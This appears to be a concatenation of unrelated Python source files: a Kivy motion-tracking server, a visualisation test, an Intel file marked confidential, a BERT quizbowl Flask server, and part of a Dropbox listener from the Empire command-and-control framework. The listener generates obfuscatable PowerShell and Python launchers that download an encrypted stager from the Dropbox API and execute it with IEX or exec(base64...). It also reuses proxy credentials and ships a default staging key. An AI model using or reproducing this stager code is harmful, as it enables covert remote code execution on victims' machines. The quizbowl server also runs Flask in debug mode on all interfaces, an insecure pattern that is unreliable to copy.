self.root.ids.override_feet_en_check.switch.active = int(config.get('parameter', 'override_feet_en_check'))
self.root.ids.feet_en_check.switch.active = int(config.get('activation', 'feet_en_check'))
self.root.ids.shin_en_check.switch.active = int(config.get('activation', 'shin_en_check'))
self.root.ids.thigh_en_check.switch.active = int(config.get('activation', 'thigh_en_check'))
self.root.ids.waist_en_check.switch.active = int(config.get('activation', 'waist_en_check'))
self.root.ids.chest_en_check.switch.active = int(config.get('activation', 'chest_en_check'))
self.root.ids.shoulder_en_check.switch.active = int(config.get('activation', 'shoulder_en_check'))
self.root.ids.upperarm_en_check.switch.active = int(config.get('activation', 'upperarm_en_check'))
self.root.ids.lfoot_o.slider1.value = float(config.get('offset', 'lfoot_pos_1'))
self.root.ids.lfoot_o.slider2.value = float(config.get('offset', 'lfoot_pos_2'))
self.root.ids.rfoot_o.slider1.value = float(config.get('offset', 'rfoot_pos_1'))
self.root.ids.rfoot_o.slider2.value = float(config.get('offset', 'rfoot_pos_2'))
self.root.ids.lshin_o.slider1.value = float(config.get('offset', 'lshin_pos_1'))
self.root.ids.lshin_o.slider2.value = float(config.get('offset', 'lshin_pos_2'))
self.root.ids.rshin_o.slider1.value = float(config.get('offset', 'rshin_pos_1'))
self.root.ids.rshin_o.slider2.value = float(config.get('offset', 'rshin_pos_2'))
self.root.ids.lthigh_o.slider1.value = float(config.get('offset', 'lthigh_pos_1'))
self.root.ids.lthigh_o.slider2.value = float(config.get('offset', 'lthigh_pos_2'))
self.root.ids.rthigh_o.slider1.value = float(config.get('offset', 'rthigh_pos_1'))
self.root.ids.rthigh_o.slider2.value = float(config.get('offset', 'rthigh_pos_2'))
self.root.ids.waist_o.slider1.value = float(config.get('offset', 'waist_pos_1'))
self.root.ids.waist_o.slider2.value = float(config.get('offset', 'waist_pos_2'))
self.root.ids.chest_o.slider1.value = float(config.get('offset', 'chest_pos_1'))
self.root.ids.chest_o.slider2.value = float(config.get('offset', 'chest_pos_2'))
self.root.ids.lshoulder_o.slider1.value = float(config.get('offset', 'lshoulder_pos_1'))
self.root.ids.lshoulder_o.slider2.value = float(config.get('offset', 'lshoulder_pos_2'))
self.root.ids.rshoulder_o.slider1.value = float(config.get('offset', 'rshoulder_pos_1'))
self.root.ids.rshoulder_o.slider2.value = float(config.get('offset', 'rshoulder_pos_2'))
self.root.ids.lupperarm_o.slider1.value = float(config.get('offset', 'lupperarm_pos_1'))
self.root.ids.lupperarm_o.slider2.value = float(config.get('offset', 'lupperarm_pos_2'))
self.root.ids.rupperarm_o.slider1.value = float(config.get('offset', 'rupperarm_pos_1'))
self.root.ids.rupperarm_o.slider2.value = float(config.get('offset', 'rupperarm_pos_2'))
self.root.ids.head_o.slider1.value = float(config.get('offset', 'head_pos_1'))
self.root.ids.head_o.slider2.value = float(config.get('offset', 'head_pos_2'))
for k in config.items('devices'):
self.devices_list[k[0]] = {}
self.devices_list[k[0]]['role'] = k[1]
if k[0] + '_role_role' in self.root.ids.keys():
self.root.ids[k[0] + '_role_role'].text = k[1]
for k in config.items('devices_mode'):
self.devices_list[k[0]]['mode'] = k[1]
if k[0] + '_role_mode' in self.root.ids.keys():
self.root.ids[k[0] + '_role_mode'].text = k[1]
for k in config.items('devices_connect'):
self.devices_list[k[0]]['connect'] = int(k[1])
if k[0] + '_role_connect' in self.root.ids.keys():
self.root.ids[k[0] + '_role_connect'].active = bool(int(k[1]))
for k in config.items('devices_power'):
self.devices_list[k[0]]['power'] = k[1]
if k[0] + '_role_power' in self.root.ids.keys():
self.root.ids[k[0] + '_role_power'].text = k[1]
for k in config.items('devices_sleep'):
self.devices_list[k[0]]['sleep'] = int(k[1])
if k[0] + '_role_sleep' in self.root.ids.keys():
self.root.ids[k[0] + '_role_sleep'].active = bool(int(k[1]))
filename = file.split('\\')[-1]
self.root.ids.save_load_text.text = '{} loaded'.format(filename)
self.update_settings(file)
except:
self.root.ids.save_load_text.text = 'Invalid file or version'
else:
self.root.ids.save_load_text.text = 'Invalid file or version'
def update_settings(self, filepath):
config = ConfigParser()
config.add_section('last_settings')
config.set('last_settings', 'path', filepath)
with open(self.settings_bak, 'w') as f:
config.write(f)
def on_start(self):
self.title = 'IMU FBT Server'
dir_path = os.path.join(os.path.expanduser('~'),
'Documents', 'imuFBT')
if not os.path.isdir(dir_path):
os.mkdir(dir_path)
self.settings_bak = os.path.join(dir_path, 'imuFBT_settings.cfg')
if os.path.isfile(self.settings_bak):
try:
config = ConfigParser()
config.read(self.settings_bak)
self.load(config.get('last_settings', 'path'))
except:
pass
self.bridgePort = 0
self.backend_run = True
self.backend_process = threading.Thread(target=self.backend, args=())
self.backend_process.start()
self.clock1 = Clock.schedule_interval(self.com_port_scanner, 3)
self.clock2 = Clock.schedule_once(self.delay_cb, 0.5)
def backend(self):
exe_path = resource_path(os.path.join('backend', 'imuFBTServerBackend.exe'))
while self.backend_run:
self.backend_exe = subprocess.Popen([exe_path], creationflags = subprocess.CREATE_NO_WINDOW)
self.backend_exe.wait()
time.sleep(1)
def delay_cb(self, dt):
self.thread_run = True
self.thread_process = threading.Thread(target=self.udp, args=())
self.thread_process.start()
self.broad_run = True
self.broad_process = threading.Thread(target=self.broadudp, args=())
self.broad_process.start()
def on_stop(self):
try:
self.clock1.cancel()
except:
pass
try:
self.clock2.cancel()
except:
pass
self.wifi_thread_run = False
try:
self.wifi_thread_process.join()
except:
pass
self.calibrate_run = False
try:
self.calibrate_process.join()
except:
pass
self.broad_run = False
try:
self.broad_process.join()
except:
pass
self.thread_run = False
try:
self.thread_process.join()
except:
pass
self.backend_run = False
try:
self.backend_exe.terminate()
self.backend_process.join()
except:
pass
self.fLock.close()
os.remove(self.lock_file)
def build(self):
dir_path = os.path.join(os.path.expanduser('~'),
'Documents', 'imuFBT')
if not os.path.isdir(dir_path):
os.mkdir(dir_path)
self.lock_file = os.path.join(dir_path, 'lock')
try:
os.remove(self.lock_file)
except PermissionError:
return sys.exit()
except FileNotFoundError:
pass
self.fLock = open(self.lock_file, 'w')
return Builder.load_file(resource_path('main.kv'))
if __name__ == '__main__':
ImuFbtServer().run()
|
moviepy_test.py
|
#!/usr/bin/env python3
from pathlib import Path
from mpl_toolkits.mplot3d import Axes3D
import rospy
import glob
import numpy as np
import matplotlib.pyplot as plt
import mayavi.mlab as mlab
import moviepy.editor as mpy
import torch
from multiprocessing import Process
from pcdet.config import cfg, cfg_from_yaml_file
from pcdet.datasets import DatasetTemplate
from pcdet.models import build_network, load_data_to_gpu
from pcdet.utils import common_utils
from visual_utils import visualize_utils as V
from std_msgs.msg import String
from sensor_msgs.msg import PointCloud2
import sensor_msgs.point_cloud2 as pc2
def LiDARSubscriber(data):
rospy.loginfo(rospy.get_caller_id())
temp_list = []
for point in pc2.read_points(data, skip_nans=True, field_names=('x', 'y', 'z')):
temp_list.append([point[0], point[1], point[2], 0])
pc_data = np.array(temp_list, dtype=np.float32)
#print(np.shape(self.pc_data), self.pc_data[0])
#np.save('my_data3.npy', self.pc_data)
#self.pc_data.astype(np.float32).tofile('my_data2.bin')
@mlab.animate
def anim():
x, y = np.mgrid[0:3:1,0:3:1]
s = mlab.surf(x, y, np.asarray(x*0.1, 'd'))
for i in range(100000):
s.mlab_source.scalars = np.asarray(x*0.1*(i+1), 'd')
yield
anim()
mlab.show()
if __name__ == '__main__':
#rospy.init_node('LiDAR_listener', anonymous=True)
#rospy.Subscriber('/points_raw', PointCloud2, LiDARSubscriber)
# @mlab.animate
# def anim():
# for i in range(100000):
# s.mlab_source.scalars = np.asarray(x*0.1*(i+1), 'd')
# yield
# anim()
# mlab.show()
vis = Process(target=anim)
vis.start()
#rospy.spin()
#node = PointCloudData()
#node.main()
# x, y = np.mgrid[0:3:1,0:3:1]
# s = mlab.surf(x, y, np.asarray(x*0.1, 'd'))
# data = np.load('data/my_data3.npy')
# x, y, z, _ = np.transpose(data)
# value = np.ones(9407)
# print(np.shape(x), np.shape(y), np.shape(z), np.shape(value), value)
# mlab.points3d(x, y, z, scale_factor=.25)
# mlab.show()
|
ProcessLineReaderWin.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
@copyright: (c)Copyright 2013, Intel Corporation All Rights Reserved.
The source code contained or described here in and all documents related
to the source code ("Material") are owned by Intel Corporation or its
suppliers or licensors. Title to the Material remains with Intel Corporation
or its suppliers and licensors. The Material contains trade secrets and
proprietary and confidential information of Intel or its suppliers and
licensors.
The Material is protected by worldwide copyright and trade secret laws and
treaty provisions. No part of the Material may be used, copied, reproduced,
modified, published, uploaded, posted, transmitted, distributed, or disclosed
in any way without Intel's prior express written permission.
No license under any patent, copyright, trade secret or other intellectual
property right is granted to or conferred upon you by disclosure or delivery
of the Materials, either expressly, by implication, inducement, estoppel or
otherwise. Any license under such intellectual property rights must be express
and approved by Intel in writing.
@organization: INTEL MCG PSI
@summary: This module implements a windows linereader object
@since: 31/07/14
@author: sfusilie
"""
from threading import Thread
from Queue import Queue, Empty
class ProcessLineReaderWin(object):
"""
LineReader object to be use as select readable input
"""
MAX_LINES_TO_READ = 500
def __init__(self, name, process, stream):
"""
:type name: str
:param name: name of the process line reader object
:type process: process
:param process: process to read from
:type stream: int
:param stream: stream file descriptor
"""
# Nice name to ease debugging between different ProcessLineReaderWin
# We usually have 2: one for stdout, one for stderr
self.name = name
# Process to work on
self._process = process
# Stream to read data from
self._stream = stream
# Reader thread
self._reader_thread = None
# Internal buffer
self._lines_queue = Queue()
# Start reading
self.start_read()
def _read_worker(self):
"""
Reader thread that will retrieve data from the stream
"""
for line in iter(self._stream.readline, ''):
line = line.rstrip("\n")
if line:
self._lines_queue.put(line)
self._stream.close()
def stop_read(self):
"""
Notify the line reader that we want to stop reading
"""
pass
def start_read(self):
"""
Notify the line reader that we want to start reading
A new reader thread will be started to retrieve data from the stream
"""
self._reader_thread = Thread(target=self._read_worker)
self._reader_thread.name = "{0} process reader line thread".format(self.name)
self._reader_thread.daemon = True
self._reader_thread.start()
def read_lines(self):
"""
Method to return lines from data read from file descriptor.
Complete line are returned
:return: Array of complete line
"""
lines = []
process_terminated = self._process.poll() is not None
try:
data = self._lines_queue.get_nowait()
for line in data.splitlines():
lines.append(line)
except Empty:
pass
if not lines and process_terminated:
# Nothing more to read
lines = None
return lines
|
ProjectServer.py
|
from typing import List, Optional, Tuple
from collections import defaultdict
import pickle
import json
from os import path
import threading
import click
from tqdm import tqdm
from flask import Flask, jsonify, request
from qanta.ProjectModel import *
from qanta.ProjectDataLoader import *
from qanta import util
if (torch.cuda.is_available()):
print("CUDA is available")
else:
print("CPU only")
device = torch.device("cuda" if torch.cuda.is_available() else "cpu")
CACHE_LOCATION = "/src/cache"
VOCAB_LOCATION = "/src/data/QuizBERT.vocab"
DATA_MANAGER_LOCATION = "/src/data/QBERT_Data.manager"
MODEL_LOCATION = "/src/data/QuizBERT.model"
TRAIN_FILE_LOCATION = "/src/data/qanta.train.2018.04.18.json"
TEST_FILE_LOCATION = "/src/data/qanta.test.2018.04.18.json"
TRAINING_PROGRESS_LOCATION = "training_progress"
BUZZTRAIN_LOCATION = "/src/data/buzztrain.json"
LOCAL_CACHE_LOCATION = "cache"
LOCAL_VOCAB_LOCATION = "/src/data/QuizBERT.vocab"
LOCAL_MODEL_LOCATION = "/src/data/QuizBERT.model"
LOCAL_TRAINING_PROGRESS_LOCATION = "train_progress"
MAX_QUESTION_LENGTH = 412
BATCH_SIZE = 15
#=======================================================================================================
# Combines guesser and buzzer outputs
#=======================================================================================================
def guess_and_buzz(guesser, text):
out = guesser.guess(text)
return (out, False)
#=======================================================================================================
# Combines batch guesser and buzzer outputs
#=======================================================================================================
def batch_guess_and_buzz(guesser, text):
out = guesser.batch_guess(text)
return [(g, False) for g in out]
#=======================================================================================================
# Executed in seperate thread so that the model can load without holding up the server.
#=======================================================================================================
def load_model(callback, vocab_file, model_file):
tokenizer = BertTokenizer.from_pretrained("bert-large-uncased", cache_dir=CACHE_LOCATION)
vocab = load_vocab(vocab_file)
#agent = BERTAgent(QuizBERT(25970, cache_dir=CACHE_LOCATION), vocab)
agent = BERTAgent(None, vocab)
agent.load_model(model_file)
agent.model_set_mode("eval")
callback(agent, tokenizer)
#=======================================================================================================
# Generates gueses using a model from quizbowl questions.
#=======================================================================================================
class Project_Guesser():
def __init__(self, vocab_file, model_file):
print("Loading model")
self.agent = None
self.tokenizer = None
self.ready = False
self.load_thread = threading.Thread(target=load_model, args=[self.load_callback, vocab_file, model_file])
self.load_thread.start()
# Called with one question string
def guess(self, text):
if (not self.ready):
self.load_thread.join()
# Tokenize question
encoded_question = torch.LongTensor([encode_question(text, self.tokenizer, MAX_QUESTION_LENGTH)]).to(device)
print(encoded_question)
output = self.agent.model_forward(encoded_question)
print(self.agent.vocab.decode_top_n(output.cpu(), 10))
print(self.agent.model.get_last_pooler_output())
guesses = self.agent.vocab.decode(output)[0]
return guesses
# called with an array of questions, returns a guess batch
def batch_guess(self, text):
if (not self.ready):
self.load_thread.join()
# Tokenize questions
encoded_questions = torch.LongTensor([encode_question(t, self.tokenizer, MAX_QUESTION_LENGTH) for t in text]).to(device)
output = self.agent.model_forward(encoded_questions)
guess = self.agent.vocab.decode(output)
return [x for x in guess]
# Called to determine if the model has been loaded
def isReady(self):
return self.ready
# Called after the loading thread is finished
def load_callback(self, agent, tokenizer):
self.agent = agent
self.tokenizer = tokenizer
self.ready = True
print("Model is loaded!")
#=======================================================================================================
# Called to start qb server.
#=======================================================================================================
def create_app(vocab_file, model_file):
guesser = Project_Guesser(vocab_file, model_file)
app = Flask(__name__)
@app.route('/api/1.0/quizbowl/act', methods=['POST'])
def act():
question = request.json['text']
guess, buzz = guess_and_buzz(guesser, question)
return jsonify({'guess': guess, 'buzz': True if buzz else False})
@app.route('/api/1.0/quizbowl/status', methods=['GET'])
def status():
print(guesser.isReady())
return jsonify({
'batch': True,
'batch_size': 10,
'ready': guesser.isReady(),
'include_wiki_paragraphs': False
})
@app.route('/api/1.0/quizbowl/batch_act', methods=['POST'])
def batch_act():
questions = [q['text'] for q in request.json['questions']]
return jsonify([
{'guess': guess, 'buzz': True if buzz else False}
for guess, buzz in batch_guess_and_buzz(guesser, questions)
])
return app
#=======================================================================================================
# Click commands for sending server arguments.
#=======================================================================================================
@click.group()
def cli():
pass
# starts the qb answer server
@cli.command()
@click.option('--host', default='0.0.0.0')
@click.option('--port', default=4861)
#@click.option('--disable-batch', default=False, is_flag=True)
@click.option('--vocab_file', default=VOCAB_LOCATION)
@click.option('--model_file', default=MODEL_LOCATION)
def web(host, port, vocab_file, model_file):
app = create_app(vocab_file, model_file)
print("Starting web app")
app.run(host=host, port=port, debug=True)
# run to train the model - vocab_file and train_file are required!
@cli.command()
@click.option('--vocab_file', default=VOCAB_LOCATION)
@click.option('--train_file', default=TRAIN_FILE_LOCATION)
@click.option('--data_limit', default=-1)
@click.option('--epochs', default=1)
@click.option('--resume', default=False, is_flag=True)
@click.option('--resume_file', default="")
@click.option('--preloaded_manager', default=False, is_flag=True)
@click.option('--manager_file', default=DATA_MANAGER_LOCATION)
@click.option('--save_regularity', default=20)
@click.option('--category_only', default=False, is_flag=True)
def train(vocab_file, train_file, data_limit, epochs, resume, resume_file, preloaded_manager, manager_file, save_regularity, category_only):
print("Loading resources...", flush = True)
tokenizer = BertTokenizer.from_pretrained("bert-large-uncased", cache_dir=CACHE_LOCATION)
vocab = load_vocab(vocab_file)
data = None
agent = None
if (preloaded_manager):
data = load_data_manager(manager_file)
data.batch_size = BATCH_SIZE # set the correct batch size
else:
data = Project_BERT_Data_Manager(MAX_QUESTION_LENGTH, vocab, BATCH_SIZE, tokenizer)
data.load_data(train_file, data_limit, category_only=category_only)
if (resume):
agent = BERTAgent(None, vocab)
agent.load_model(resume_file, data)
else:
agent = BERTAgent(QuizBERT(data.get_answer_vector_length(), cache_dir=CACHE_LOCATION), vocab)
print("Finished loading - commence training.", flush = True)
#agent.model_set_mode("train")
current_epoch = data.full_epochs
while (current_epoch < epochs):
current_epoch = data.full_epochs
agent.train_epoch(data, save_regularity, TRAINING_PROGRESS_LOCATION)
agent.save_model({"epoch":data.full_epochs, "completed":True}, TRAINING_PROGRESS_LOCATION + "/QuizBERT.model")
print("Training completed - " + str(epochs) + " full epochs", flush = True)
# High-efficiency evaluation - has an option to generate buzztrain file
@cli.command()
#@click.option('--disable-batch', default=False, is_flag=True)
@click.option('--vocab_file', default=VOCAB_LOCATION)
@click.option('--model_file', default=MODEL_LOCATION)
@click.option('--split_sentences', default=False, is_flag=True)
@click.option('--dobuzztrain', default=False, is_flag=True)
@click.option('--buzztrainfile', default=BUZZTRAIN_LOCATION)
@click.option('--preloaded_manager', default=False, is_flag=True)
@click.option('--manager_file', default=DATA_MANAGER_LOCATION)
@click.option('--data_file', default=TEST_FILE_LOCATION)
@click.option('--top_k', default=10)
@click.option('--category_only', default=False, is_flag=True)
def evaluate(vocab_file, model_file, split_sentences, dobuzztrain, buzztrainfile, preloaded_manager, manager_file, data_file, top_k, category_only):
tokenizer = BertTokenizer.from_pretrained("bert-large-uncased", cache_dir=CACHE_LOCATION)
vocab = load_vocab(vocab_file)
data = None
agent = None
save_loc = None
if (dobuzztrain):
save_loc = buzztrainfile
agent = BERTAgent(None, vocab)
agent.load_model(model_file, data)
if (preloaded_manager):
data = load_data_manager(manager_file)
data.batch_size = BATCH_SIZE # set the correct batch size
else:
data = Project_BERT_Data_Manager(MAX_QUESTION_LENGTH, vocab, BATCH_SIZE, tokenizer)
data.load_data(data_file, -1, split_sentences=split_sentences, category_only=category_only)
print("Finished loading - commence evaluation.", flush = True)
agent.model_evaluate(data, save_loc, top_k)
print("Finished evaluation")
# Run to generate vocab file in specified location using specified data file.
@cli.command()
@click.option('--save_location', default=VOCAB_LOCATION)
@click.option('--data_file', default=TRAIN_FILE_LOCATION)
@click.option('--category_only', default=False, is_flag=True)
def vocab(save_location, data_file, category_only):
answer_vocab_generator(data_file, save_location, category_only=category_only)
# Run to generate data manager file in specified location using specified data file.
@cli.command()
@click.option('--vocab_location', default=VOCAB_LOCATION)
@click.option('--save_location', default=DATA_MANAGER_LOCATION)
@click.option('--data_file', default=TRAIN_FILE_LOCATION)
@click.option('--limit', default=-1)
@click.option('--category_only', default=False, is_flag=True)
def makemanager(vocab_location, save_location, data_file, limit, category_only):
vocab = load_vocab(vocab_location)
tokenizer = BertTokenizer.from_pretrained("bert-large-uncased", cache_dir=CACHE_LOCATION)
loader = Project_BERT_Data_Manager(MAX_QUESTION_LENGTH, vocab, BATCH_SIZE, tokenizer)
loader.load_data(data_file, limit, category_only=category_only)
save_data_manager(loader, DATA_MANAGER_LOCATION)
# Run to check if cuda is available.
@cli.command()
def cudatest():
print(device)
# Run once to download qanta data to data/. Runs inside the docker container, but results save to host machine
@cli.command()
@click.option('--local-qanta-prefix', default='data/')
#@click.option('--retrieve-paragraphs', default=False, is_flag=True) #retrieve_paragraphs
def download(local_qanta_prefix):
util.download(local_qanta_prefix, False)
if __name__ == '__main__':
print("Starting QB")
cli()
|
dbx.py
|
from __future__ import print_function
import base64
import copy
import json
import os
import time
from builtins import object, str
from textwrap import dedent
from typing import List
import dropbox
from pydispatch import dispatcher
from empire.server.common import encryption, helpers, templating
from empire.server.database import models
from empire.server.database.base import Session
from empire.server.utils import data_util, listener_util
class Listener(object):
def __init__(self, mainMenu, params=[]):
self.info = {
"Name": "Dropbox",
"Author": ["@harmj0y"],
"Description": ("Starts a Dropbox listener."),
"Category": ("third_party"),
"Comments": [],
}
# any options needed by the stager, settable during runtime
self.options = {
# format:
# value_name : {description, required, default_value}
"Name": {
"Description": "Name for the listener.",
"Required": True,
"Value": "dropbox",
},
"APIToken": {
"Description": "Authorization token for Dropbox API communication.",
"Required": True,
"Value": "",
},
"PollInterval": {
"Description": "Polling interval (in seconds) to communicate with the Dropbox Server.",
"Required": True,
"Value": "5",
},
"BaseFolder": {
"Description": "The base Dropbox folder to use for comms.",
"Required": True,
"Value": "/Empire/",
},
"StagingFolder": {
"Description": "The nested Dropbox staging folder.",
"Required": True,
"Value": "/staging/",
},
"TaskingsFolder": {
"Description": "The nested Dropbox taskings folder.",
"Required": True,
"Value": "/taskings/",
},
"ResultsFolder": {
"Description": "The nested Dropbox results folder.",
"Required": True,
"Value": "/results/",
},
"Launcher": {
"Description": "Launcher string.",
"Required": True,
"Value": "powershell -noP -sta -w 1 -enc ",
},
"StagingKey": {
"Description": "Staging key for initial agent negotiation.",
"Required": True,
"Value": "2c103f2c4ed1e59c0b4e2e01821770fa",
},
"DefaultDelay": {
"Description": "Agent delay/reach back interval (in seconds).",
"Required": True,
"Value": 60,
},
"DefaultJitter": {
"Description": "Jitter in agent reachback interval (0.0-1.0).",
"Required": True,
"Value": 0.0,
},
"DefaultLostLimit": {
"Description": "Number of missed checkins before exiting",
"Required": True,
"Value": 10,
},
"DefaultProfile": {
"Description": "Default communication profile for the agent.",
"Required": True,
"Value": "/admin/get.php,/news.php,/login/process.php|Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko",
},
"KillDate": {
"Description": "Date for the listener to exit (MM/dd/yyyy).",
"Required": False,
"Value": "",
},
"WorkingHours": {
"Description": "Hours for the agent to operate (09:00-17:00).",
"Required": False,
"Value": "",
},
"SlackURL": {
"Description": "Your Slack Incoming Webhook URL to communicate with your Slack instance.",
"Required": False,
"Value": "",
},
}
# required:
self.mainMenu = mainMenu
self.threads = {}
# optional/specific for this module
# set the default staging key to the controller db default
self.options["StagingKey"]["Value"] = str(
data_util.get_config("staging_key")[0]
)
def default_response(self):
"""
Returns a default HTTP server page.
"""
return ""
def validate_options(self):
"""
Validate all options for this listener.
"""
self.uris = [
a.strip("/")
for a in self.options["DefaultProfile"]["Value"].split("|")[0].split(",")
]
for key in self.options:
if self.options[key]["Required"] and (
str(self.options[key]["Value"]).strip() == ""
):
print(helpers.color('[!] Option "%s" is required.' % (key)))
return False
return True
def generate_launcher(
self,
encode=True,
obfuscate=False,
obfuscationCommand="",
userAgent="default",
proxy="default",
proxyCreds="default",
stagerRetries="0",
language=None,
safeChecks="",
listenerName=None,
bypasses: List[str] = None,
):
"""
Generate a basic launcher for the specified listener.
"""
bypasses = [] if bypasses is None else bypasses
if not language:
print(
helpers.color(
"[!] listeners/dbx generate_launcher(): no language specified!"
)
)
if (
listenerName
and (listenerName in self.threads)
and (listenerName in self.mainMenu.listeners.activeListeners)
):
# extract the set options for this instantiated listener
listenerOptions = self.mainMenu.listeners.activeListeners[listenerName][
"options"
]
# host = listenerOptions['Host']['Value']
staging_key = listenerOptions["StagingKey"]["Value"]
profile = listenerOptions["DefaultProfile"]["Value"]
launcher = listenerOptions["Launcher"]["Value"]
staging_key = listenerOptions["StagingKey"]["Value"]
pollInterval = listenerOptions["PollInterval"]["Value"]
api_token = listenerOptions["APIToken"]["Value"]
baseFolder = listenerOptions["BaseFolder"]["Value"].strip("/")
staging_folder = "/%s/%s" % (
baseFolder,
listenerOptions["StagingFolder"]["Value"].strip("/"),
)
taskingsFolder = "/%s/%s" % (
baseFolder,
listenerOptions["TaskingsFolder"]["Value"].strip("/"),
)
resultsFolder = "/%s/%s" % (
baseFolder,
listenerOptions["ResultsFolder"]["Value"].strip("/"),
)
if language.startswith("po"):
# PowerShell
# replace with stager = '' for troubleshooting
stager = '$ErrorActionPreference = "SilentlyContinue";'
if safeChecks.lower() == "true":
stager = "If($PSVersionTable.PSVersion.Major -ge 3){"
for bypass in bypasses:
stager += bypass
stager += "};[System.Net.ServicePointManager]::Expect100Continue=0;"
stager += "$wc=New-Object System.Net.WebClient;"
if userAgent.lower() == "default":
profile = listenerOptions["DefaultProfile"]["Value"]
userAgent = profile.split("|")[1]
stager += f"$u='{ userAgent }';"
if userAgent.lower() != "none" or proxy.lower() != "none":
if userAgent.lower() != "none":
stager += "$wc.Headers.Add('User-Agent',$u);"
if proxy.lower() != "none":
if proxy.lower() == "default":
stager += (
"$wc.Proxy=[System.Net.WebRequest]::DefaultWebProxy;"
)
else:
# TODO: implement form for other proxy
stager += f"""
$proxy=New-Object Net.WebProxy;
$proxy.Address = '{ proxy.lower() }';
$wc.Proxy = $proxy;
"""
if proxyCreds.lower() == "default":
stager += "$wc.Proxy.Credentials = [System.Net.CredentialCache]::DefaultNetworkCredentials;"
else:
# TODO: implement form for other proxy credentials
username = proxyCreds.split(":")[0]
password = proxyCreds.split(":")[1]
domain = username.split("\\")[0]
usr = username.split("\\")[1]
stager += f"""
$netcred = New-Object System.Net.NetworkCredential('{ usr }', '{ password }', '{ domain }');
$wc.Proxy.Credentials = $netcred;
"""
# save the proxy settings to use during the entire staging process and the agent
stager += "$Script:Proxy = $wc.Proxy;"
# TODO: reimplement stager retries?
# code to turn the key string into a byte array
stager += f"$K=[System.Text.Encoding]::ASCII.GetBytes('{staging_key}');"
# this is the minimized RC4 stager code from rc4.ps1
stager += listener_util.powershell_rc4()
stager += dedent(
f"""
# add in the Dropbox auth token and API params
$t='{ api_token }';
$wc.Headers.Add("Authorization","Bearer $t");
$wc.Headers.Add("Dropbox-API-Arg",\'{{"path":"{ staging_folder }/debugps"}}\');
$data=$wc.DownloadData('https://content.dropboxapi.com/2/files/download');
$iv=$data[0..3];$data=$data[4..$data.length];
# decode everything and kick it over to IEX to kick off execution
-join[Char[]](& $R $data ($IV+$K))|IEX
"""
)
# Remove comments and make one line
stager = helpers.strip_powershell_comments(stager)
stager = data_util.ps_convert_to_oneliner(stager)
if obfuscate:
stager = data_util.obfuscate(
self.mainMenu.installPath,
stager,
obfuscationCommand=obfuscationCommand,
)
# base64 encode the stager and return it
if encode and (
(not obfuscate) or ("launcher" not in obfuscationCommand.lower())
):
return helpers.powershell_launcher(stager, launcher)
else:
# otherwise return the case-randomized stager
return stager
elif language.startswith("py"):
launcherBase = "import sys;"
# monkey patch ssl woohooo
launcherBase += "import ssl;\nif hasattr(ssl, '_create_unverified_context'):ssl._create_default_https_context = ssl._create_unverified_context;"
try:
if safeChecks.lower() == "true":
launcherBase += listener_util.python_safe_checks()
except Exception as e:
p = "[!] Error setting LittleSnitch in stager: " + str(e)
print(helpers.color(p, color="red"))
if userAgent.lower() == "default":
profile = listenerOptions["DefaultProfile"]["Value"]
userAgent = profile.split("|")[1]
launcherBase += dedent(
f"""
import urllib.request;
UA='{ userAgent }';
t='{ api_token }';
server='https://content.dropboxapi.com/2/files/download';
req=urllib.request.Request(server);
req.add_header('User-Agent',UA);
req.add_header("Authorization","Bearer "+t);
req.add_header("Dropbox-API-Arg",'{{"path":"{ staging_folder }/debugpy"}}');
"""
)
if proxy.lower() != "none":
if proxy.lower() == "default":
launcherBase += "proxy = urllib.request.ProxyHandler();\n"
else:
proto = proxy.Split(":")[0]
launcherBase += f"proxy = urllib.request.ProxyHandler({{'{proto}':'{proxy}'}});\n"
if proxyCreds != "none":
if proxyCreds == "default":
launcherBase += "o = urllib.request.build_opener(proxy);\n"
else:
launcherBase += "proxy_auth_handler = urllib.request.ProxyBasicAuthHandler();\n"
username = proxyCreds.split(":")[0]
password = proxyCreds.split(":")[1]
launcherBase += dedent(
f"""
proxy_auth_handler.add_password(None,'{ proxy }', '{ username }', '{ password }');
o = urllib.request.build_opener(proxy, proxy_auth_handler);
"""
)
else:
launcherBase += "o = urllib.request.build_opener(proxy);\n"
else:
launcherBase += "o = urllib.request.build_opener();\n"
# install proxy and creds globally, so they can be used with urlopen.
launcherBase += "urllib.request.install_opener(o);\n"
launcherBase += "a=urllib.request.urlopen(req).read();\n"
# RC4 decryption
launcherBase += listener_util.python_extract_stager(staging_key)
if encode:
launchEncoded = base64.b64encode(
launcherBase.encode("UTF-8")
).decode("UTF-8")
launcher = (
"echo \"import sys,base64;exec(base64.b64decode('%s'));\" | python3 &"
% (launchEncoded)
)
return launcher
else:
return launcherBase
else:
print(
helpers.color(
"[!] listeners/dbx generate_launcher(): invalid listener name specification!"
)
)
def generate_stager(
self, listenerOptions, encode=False, encrypt=True, language=None
):
"""
Generate the stager code needed for communications with this listener.
"""
if not language:
print(
helpers.color(
"[!] listeners/dbx generate_stager(): no language specified!"
)
)
return None
pollInterval = listenerOptions["PollInterval"]["Value"]
stagingKey = listenerOptions["StagingKey"]["Value"]
baseFolder = listenerOptions["BaseFolder"]["Value"].strip("/")
apiToken = listenerOptions["APIToken"]["Value"]
profile = listenerOptions["DefaultProfile"]["Value"]
workingHours = listenerOptions["WorkingHours"]["Value"]
stagingFolder = "/%s/%s" % (
baseFolder,
listenerOptions["StagingFolder"]["Value"].strip("/"),
)
if language.lower() == "powershell":
# read in the stager base
with open(
"%s/data/agent/stagers/dropbox.ps1" % (self.mainMenu.installPath)
) as f:
stager = f.read()
# patch the server and key information
stager = stager.replace("REPLACE_STAGING_FOLDER", stagingFolder)
stager = stager.replace("REPLACE_STAGING_KEY", stagingKey)
stager = stager.replace("REPLACE_POLLING_INTERVAL", pollInterval)
# patch in working hours, if any
if workingHours != "":
stager = stager.replace("WORKING_HOURS_REPLACE", workingHours)
unobfuscated_stager = ""
for line in stager.split("\n"):
line = line.strip()
# skip commented line
if not line.startswith("#"):
unobfuscated_stager += line
# base64 encode the stager and return it
if encode:
return helpers.enc_powershell(unobfuscated_stager)
elif encrypt:
RC4IV = os.urandom(4)
return RC4IV + encryption.rc4(
RC4IV + stagingKey.encode("UTF-8"),
unobfuscated_stager.encode("UTF-8"),
)
else:
# otherwise just return the case-randomized stager
return unobfuscated_stager
elif language.lower() == "python":
template_path = [
os.path.join(self.mainMenu.installPath, "/data/agent/stagers"),
os.path.join(self.mainMenu.installPath, "./data/agent/stagers"),
]
eng = templating.TemplateEngine(template_path)
template = eng.get_template("dropbox.py")
template_options = {
"staging_folder": stagingFolder,
"poll_interval": pollInterval,
